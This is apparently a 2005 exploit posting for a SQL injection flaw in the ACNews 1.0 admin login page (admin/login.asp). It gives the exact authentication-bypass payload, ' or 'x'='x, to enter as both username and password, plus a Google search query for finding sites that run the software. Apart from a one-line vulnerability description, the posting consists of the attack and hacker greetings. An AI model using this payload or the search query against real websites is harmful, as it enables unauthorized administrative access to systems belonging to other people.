SQL injection vulnerability in admin/login.asp in aspclick.it ACNews 1.0 allows remote malicious users to execute arbitrary SQL commands via the (1) username or (2) password parameters.
# wwwgooglecom/search?hl=en&lr=&q=acnews+10+loginasp&btnG=Search
# /str0ke
Product:ACNews
version :10
VULNERABILITY CLASS: SQL injection
[exploit]
Log in with
username:' or 'x'='x
password :' or 'x'='x
from admin/loginasp page
greetz to HaXoR & LOverboy
auther : LaMeR
securitygurus team
# milw0rmcom [2005-04-09] ...